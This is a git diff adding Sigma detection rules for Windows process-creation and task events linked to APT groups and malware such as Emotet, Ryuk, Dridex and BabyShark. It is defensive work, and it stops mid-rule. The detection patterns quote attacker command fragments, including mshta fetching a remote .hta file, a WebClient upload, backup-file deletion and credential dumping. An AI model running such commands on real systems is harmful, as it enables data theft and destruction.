b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml new file mode 100644 index 000000000..f50398291 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/Slingshot/win_security_apt_slingshot.yml @@ -0,0 +1,32 @@ +title: Defrag Deactivation - Security +id: c5a178bf-9cfb-4340-b584-e4df39b6a3e7 +related: + - id: 958d81aa-8566-4cea-a565-59ccd4df27b0 + type: derived +status: test +description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group +references: + - https://securelist.com/apt-slingshot/84312/ +author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1) +date: 2019/03/04 +modified: 2022/11/27 +tags: + - attack.persistence + - attack.t1053 + - attack.s0111 + - detection.emerging_threats +logsource: + product: windows + service: security + definition: 'Requirements: Audit Policy : Audit Other Object Access Events > Success' +detection: + security: + Channel: Security + selection: + EventID: 4701 + TaskName: \Microsoft\Windows\Defrag\ScheduledDefrag + condition: security and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml new file mode 100644 index 000000000..a44892193 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2018/TA/TropicTrooper/proc_creation_win_apt_tropictrooper.yml @@ -0,0 +1,25 @@ +title: TropicTrooper Campaign November 2018 +id: 8c7090c3-e0a0-4944-bd08-08c3a0cecf79 +status: stable +description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia +references: + - https://www.microsoft.com/en-us/security/blog/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/ +author: '@41thexplorer, Microsoft Defender ATP' +date: 2019/11/12 +modified: 2020/08/27 +tags: + - attack.execution + - attack.t1059.001 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc + condition: process_creation and selection +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml new file mode 100644 index 000000000..7fe19772e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Exploits/BearLPE-Exploit/proc_creation_win_exploit_other_bearlpe.yml @@ -0,0 +1,35 @@ +title: Potential BearLPE Exploitation +id: 931b6802-d6a6-4267-9ffa-526f57f22aaf +status: test +description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par +references: + - https://github.com/djhohnstein/polarbearrepo/blob/f26d3e008093cc5c835e92a7165170baf6713d43/bearlpe/polarbear/polarbear/exploit.cpp +author: Olaf Hartong +date: 2019/05/22 +modified: 2023/01/26 +tags: + - attack.privilege_escalation + - attack.t1053.005 + - car.2013-08-001 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + - NewProcessName|endswith: \schtasks.exe + - OriginalFileName: schtasks.exe + selection_cli: + CommandLine|contains|all: + - /change + - /TN + - /RU + - /RP + condition: process_creation and (all of selection*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml new file mode 100644 index 000000000..f51deb85f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Exploits/CVE-2019-1388/proc_creation_win_exploit_cve_2019_1388.yml @@ -0,0 +1,37 @@ +title: Exploiting CVE-2019-1388 +id: 02e0b2ea-a597-428e-b04a-af6a1a403e5c +status: stable +description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM +references: + - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388 + - https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege +author: Florian Roth (Nextron Systems) +date: 2019/11/20 +modified: 2022/05/27 +tags: + - attack.privilege_escalation + - attack.t1068 + - cve.2019.1388 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: ' http' + ParentProcessName|endswith: \consent.exe + NewProcessName|endswith: \iexplore.exe + rights1: + MandatoryLabel: S-1-16-16384 + rights2: + SubjectUserName|contains: # covers many language settings + - AUTHORI + - AUTORI + condition: process_creation and (selection and ( rights1 or rights2 )) +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml new file mode 100644 index 000000000..6f56ab7b3 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/BabyShark/proc_creation_win_malware_babyshark.yml @@ -0,0 +1,38 @@ +title: Potential Baby Shark Malware Activity +id: 2b30fa36-3a18-402f-a22d-bf4ce2189f35 +status: test +description: Detects activity that could be related to Baby Shark malware +references: + - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ +author: Florian Roth (Nextron Systems) +date: 2019/02/24 +modified: 2023/03/08 +tags: + - attack.execution + - attack.defense_evasion + - attack.discovery + - attack.t1012 + - attack.t1059.003 + - attack.t1059.001 + - attack.t1218.005 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + - CommandLine|contains|all: + - powershell.exe mshta.exe http + - .hta + - CommandLine|contains: + - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" + - cmd.exe /c taskkill /im cmd.exe + - (New-Object System.Net.WebClient).UploadFile('http + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml new file mode 100644 index 000000000..17f16035e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Dridex/proc_creation_win_malware_dridex.yml @@ -0,0 +1,55 @@ +title: Potential Dridex Activity +id: e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e +status: stable +description: Detects potential Dridex acitvity via specific process patterns +references: + - https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3 + - https://redcanary.com/threat-detection-report/threats/dridex/ +author: Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems) +date: 2019/01/10 +modified: 2023/02/03 +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1055 + - attack.discovery + - attack.t1135 + - attack.t1033 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_svchost: + CommandLine|contains|all: + - C:\Users\ + - \Desktop\ + NewProcessName|endswith: \svchost.exe + filter_svchost: + ParentProcessName|startswith: C:\Windows\System32\ + selection_regsvr: + CommandLine|contains: + - ' -s ' + - \AppData\Local\Temp\ + ParentProcessName|endswith: \excel.exe + NewProcessName|endswith: \regsvr32.exe + filter_regsvr: + CommandLine|contains: .dll + selection_anomaly_parent: + ParentProcessName|endswith: \svchost.exe + selection_anomaly_child_1: + CommandLine|contains: ' /all' + NewProcessName|endswith: \whoami.exe + selection_anomaly_child_2: + CommandLine|contains: ' view' + NewProcessName|endswith: + - \net.exe + - \net1.exe + condition: process_creation and ((selection_svchost and not filter_svchost) or (selection_regsvr and not filter_regsvr) or (selection_anomaly_parent and 1 of selection_anomaly_child_*)) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml new file mode 100644 index 000000000..2229c4279 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Dtrack-RAT/proc_creation_win_malware_dtrack.yml @@ -0,0 +1,44 @@ +title: Potential Dtrack RAT Activity +id: f1531fa4-5b84-4342-8f68-9cf3fdbd83d4 +status: stable +description: Detects potential Dtrack RAT activity via specific process patterns +references: + - https://securelist.com/my-name-is-dtrack/93338/ + - https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/ + - https://www.cyberbit.com/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/ + - https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/ + - https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/ +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +date: 2019/10/30 +modified: 2023/02/03 +tags: + - attack.impact + - attack.t1490 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_ping: + CommandLine|contains|all: + - 'ping -n ' + - ' echo EEEE > ' + selection_ipconfig: + CommandLine|contains|all: + - ipconfig /all + - \temp\res.ip + selection_netsh: + CommandLine|contains|all: + - interface ip show config + - \temp\netsh.res + condition: process_creation and (1 of selection_*) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml new file mode 100644 index 000000000..6681a803f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Emotet/proc_creation_win_malware_emotet.yml @@ -0,0 +1,51 @@ +title: Potential Emotet Activity +id: d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18 +status: stable +description: Detects all Emotet like process executions that are not covered by the more generic rules +references: + - https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/ + - https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/ + - https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/ + - https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/ +author: Florian Roth (Nextron Systems) +date: 2019/09/30 +modified: 2023/02/04 +tags: + - attack.execution + - attack.t1059.001 + - attack.defense_evasion + - attack.t1027 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + - ' -e* PAA' + - JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ # $env:userprofile + - QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA # $env:userprofile + - kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA # $env:userprofile + - IgAoACcAKgAnACkAOwAkA # "('*');$ + - IAKAAnACoAJwApADsAJA # "('*');$ + - iACgAJwAqACcAKQA7ACQA # "('*');$ + - JABGAGwAeAByAGgAYwBmAGQ + - PQAkAGUAbgB2ADoAdABlAG0AcAArACgA # =$env:temp+( + - 0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA # =$env:temp+( + - 9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA # =$env:temp+( + filter: + CommandLine|contains: + - fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ + - wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA + - 8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA + condition: process_creation and (selection and not filter) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml new file mode 100644 index 000000000..26e3547c7 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml @@ -0,0 +1,57 @@ +title: Formbook Process Creation +id: 032f5fb3-d959-41a5-9263-4173c802dc2b +status: test +description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters. +references: + - https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer + - https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/ + - https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/ + - https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/ +author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +date: 2019/09/30 +modified: 2022/10/06 +tags: + - attack.resource_development + - attack.t1587.001 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + # Parent command line should not contain a space value + # This avoids false positives not caused by process injection + # e.g. wscript.exe /B sysmon-install.vbs + ParentCommandLine|startswith: + - C:\Windows\System32\ + - C:\Windows\SysWOW64\ + ParentCommandLine|endswith: .exe + selection2: + - CommandLine|contains|all: + - /c + - del + - C:\Users\ + - \AppData\Local\Temp\ + - CommandLine|contains|all: + - /c + - del + - C:\Users\ + - \Desktop\ + - CommandLine|contains|all: + - /C + - type nul > + - C:\Users\ + - \Desktop\ + selection3: + CommandLine|endswith: .exe + condition: process_creation and (all of selection*) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml new file mode 100644 index 000000000..c44323e1a --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml @@ -0,0 +1,29 @@ +title: LockerGoga Ransomware Activity +id: 74db3488-fd28-480a-95aa-b7af626de068 +status: stable +description: Detects LockerGoga ransomware activity via specific command line. +references: + - https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a + - https://blog.f-secure.com/analysis-of-lockergoga-ransomware/ + - https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/ +author: Vasiliy Burov, oscd.community +date: 2020/10/18 +modified: 2023/02/03 +tags: + - attack.impact + - attack.t1486 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: -i SM-tgytutrc -s + condition: process_creation and selection +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml new file mode 100644 index 000000000..12c863c7c --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml @@ -0,0 +1,39 @@ +title: Potential QBot Activity +id: 4fcac6eb-0287-4090-8eea-2602e4c20040 +status: stable +description: Detects potential QBot activity by looking for process executions used previously by QBot +references: + - https://twitter.com/killamjr/status/1179034907932315648 + - https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/ +author: Florian Roth (Nextron Systems) +date: 2019/10/01 +modified: 2023/02/03 +tags: + - attack.execution + - attack.t1059.005 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + ParentProcessName|endswith: \WinRAR.exe + NewProcessName|endswith: \wscript.exe + selection2: + CommandLine|contains: ' /c ping.exe -n 6 127.0.0.1 & type ' + selection3: + CommandLine|contains|all: + - regsvr32.exe + - C:\ProgramData + - .tmp + condition: process_creation and (1 of selection*) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml new file mode 100644 index 000000000..8b10b62ae --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml @@ -0,0 +1,56 @@ +title: Potential Ryuk Ransomware Activity +id: c37510b8-2107-4b78-aa32-72f251e7a844 +related: + - id: 58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27 + type: similar + - id: 0acaad27-9f02-4136-a243-c357202edd74 + type: obsoletes +status: stable +description: Detects Ryuk ransomware activity +references: + - https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/ + - https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/ +author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems) +date: 2019/12/16 +modified: 2023/02/03 +tags: + - attack.persistence + - attack.t1547.001 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_reg: + CommandLine|contains|all: + - Microsoft\Windows\CurrentVersion\Run + - C:\users\Public\ + selection_del: + CommandLine|contains|all: + - del /s /f /q c:\ + - \*.bac + - \*.bak + - \*.bkf + selection_net: + CommandLine|contains|all: + - ' stop ' + - ' /y' + CommandLine|contains: + - samss + - audioendpointbuilder + - unistoresvc_ + - AcrSch2Svc + NewProcessName|endswith: + - \net.exe + - \net1.exe + condition: process_creation and (1 of selection_*) +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml new file mode 100644 index 000000000..fb36aa973 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml @@ -0,0 +1,33 @@ +title: Potential Snatch Ransomware Activity +id: 5325945e-f1f0-406e-97b8-65104d393fff +status: stable +description: Detects specific process characteristics of Snatch ransomware word document droppers +references: + - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ +author: Florian Roth (Nextron Systems) +date: 2020/08/26 +modified: 2023/02/13 +tags: + - attack.execution + - attack.t1204 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + - shutdown /r /f /t 00 # Shutdown in safe mode immediately + - net stop SuperBackupMan + condition: process_creation and selection +fields: + - SubjectUserName + - NewProcessName + - ComputerName +falsepositives: + - Scripts that shutdown the system immediately and reboot them in safe mode are unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml new file mode 100644 index 000000000..48f03fba3 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml @@ -0,0 +1,31 @@ +title: Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 +id: bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0 +status: test +description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local +references: + - https://pbs.twimg.com/media/EF3yLGoWkAEGeLa?format=jpg +author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems) +date: 2019/10/02 +modified: 2023/03/29 +tags: + - attack.defense_evasion + - attack.t1218.010 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - regsvr32 + - \AppData\Local\ + - .dll + - ',DllEntry' + condition: process_creation and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml new file mode 100644 index 000000000..bd9f91174 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml @@ -0,0 +1,42 @@ +title: APT31 Judgement Panda Activity +id: 03e2746e-2b31-42f1-ab7a-eb39365b2422 +status: test +description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report +references: + - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html +author: Florian Roth (Nextron Systems) +date: 2019/02/21 +modified: 2023/03/10 +tags: + - attack.lateral_movement + - attack.credential_access + - attack.g0128 + - attack.t1003.001 + - attack.t1560.001 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_ldifde: + CommandLine|contains|all: + - ldifde + - -f -n + - eprod.ldf + selection_lateral_movement: + CommandLine|contains|all: + - copy \\\\ + - c$ + CommandLine|contains: + - \aaaa\procdump64.exe + - \aaaa\netsess.exe + - \aaaa\7za.exe + - \c$\aaaa\ + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml new file mode 100644 index 000000000..cdbd7ffa9 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml @@ -0,0 +1,35 @@ +title: Potential Russian APT Credential Theft Activity +id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee +status: stable +description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike +references: + - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html +author: Florian Roth (Nextron Systems) +date: 2019/02/21 +modified: 2023/03/08 +tags: + - attack.credential_access + - attack.t1552.001 + - attack.t1003.003 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_xcopy: + CommandLine|contains|all: + - xcopy /S /E /C /Q /H \\\\ + - \sysvol\ + selection_adexplorer: + CommandLine|contains|all: + - adexplorer -snapshot "" c:\users\ + - \downloads\ + - .snp + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml new file mode 100644 index 000000000..31eff7409 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml @@ -0,0 +1,30 @@ +title: Potential EmpireMonkey Activity +id: 10152a7b-b566-438f-a33c-390b607d1c8d +status: experimental +description: Detects potential EmpireMonkey APT activity +references: + - https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/ + - https://malpedia.caad.fkie.fraunhofer.de/actor/anthropoid_spider +author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) +date: 2019/04/02 +modified: 2023/03/09 +tags: + - attack.defense_evasion + - attack.t1218.010 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - /e:jscript # This is a guess since the report doesn't mention the method of execution. This assumes that it is achieved via specifying the execution engine + - \Local\Temp\Errors.bat + condition: process_creation and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml new file mode 100644 index 000000000..2fc96f369 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml @@ -0,0 +1,32 @@ +title: Equation Group DLL_U Export Function Load +id: d465d1d8-27a2-4cca-9621-a800f37cf72e +status: stable +description: Detects a specific export function name used by one of EquationGroup tools +references: + - https://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type= + - https://twitter.com/cyb3rops/status/972186477512839170 +author: Florian Roth (Nextron Systems) +date: 2019/03/04 +modified: 2023/03/09 +tags: + - attack.g0020 + - attack.defense_evasion + - attack.t1218.011 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + - CommandLine|contains: -export dll_u + - CommandLine|endswith: + - ',dll_u' + - ' dll_u' + condition: process_creation and selection +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml new file mode 100644 index 000000000..8dcd7da61 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml @@ -0,0 +1,40 @@ +title: Mustang Panda Dropper +id: 2d87d610-d760-45ee-a7e6-7a6f2a65de00 +status: test +description: Detects specific process parameters as used by Mustang Panda droppers +references: + - https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/ + - https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/ + - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations +author: Florian Roth (Nextron Systems), oscd.community +date: 2019/10/30 +modified: 2021/11/27 +tags: + - attack.t1587.001 + - attack.resource_development + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_cli: + - CommandLine|contains: + - Temp\wtask.exe /create + - '%windir:~-3,1%%PUBLIC:~-9,1%' + - '/tn "Security Script ' + - '%windir:~-1,1%' + - CommandLine|contains|all: + - /E:vbscript + - C:\Users\ + - .txt + - /F + selection_img: + NewProcessName|endswith: Temp\winwsh.exe + condition: process_creation and (1 of selection_*) +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml new file mode 100644 index 000000000..f5e5a7331 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml @@ -0,0 +1,48 @@ +title: Operation Wocao Activity +id: 1cfac73c-be78-4f9a-9b08-5bde0c3953ab +related: + - id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d + type: derived +status: test +description: Detects activity mentioned in Operation Wocao report +references: + - https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/ + - https://twitter.com/SBousseaden/status/1207671369963646976 +author: Florian Roth (Nextron Systems), frack113 +date: 2019/12/20 +modified: 2022/10/09 +tags: + - attack.discovery + - attack.t1012 + - attack.defense_evasion + - attack.t1036.004 + - attack.t1027 + - attack.execution + - attack.t1053.005 + - attack.t1059.001 + - detection.emerging_threats +logsource: + category: 